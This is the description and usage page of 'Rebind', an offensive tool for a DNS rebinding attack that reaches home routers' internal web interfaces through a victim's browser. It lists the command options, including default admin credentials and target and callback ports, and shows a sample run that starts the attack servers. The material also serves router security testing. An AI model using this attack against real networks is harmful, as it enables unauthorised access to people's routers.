Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non RFC1918) IP address.
Rebind provides an external attacker access to a target router’s internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and who bind their Web service to the router’s WAN interface. Note that remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker. See docs/whitepaper.pdf for a detailed description of the attack.
-i <interface> Specify the network interface to bind to -d <fqdn> Specify your registered domain name -u <user> Specify the Basic Authentication user name [admin] -a <pass> Specify the Basic Authentication password [admin] -r <path> Specify the initial URL request path [/] -t <ip> Specify a comma separated list of target IP addresses [client IP] -n <time> Specify the callback interval in milliseconds  -p <port> Specify the target port  -c <port> Specify the callback port  -C <value> Specify a cookie to set for the client -H <file> Specify a file of HTTP headers for the client to send to the target
cyborg@cyborg:~$ sudo rebind -i eth0 -d localhost [+] Starting DNS server on port 53 [+] Starting attack Web server on port 80 [+] Starting callback Web server on port 81 [+] Starting proxy server on 192.168.1.4:664 [+] Services started and running! > dns [+] 192.168.1.4 localhost. [+] 192.168.1.4 www.localhost. [+] 192.168.1.4 ns1.localhost. [+] 192.168.1.4 ns2.localhost.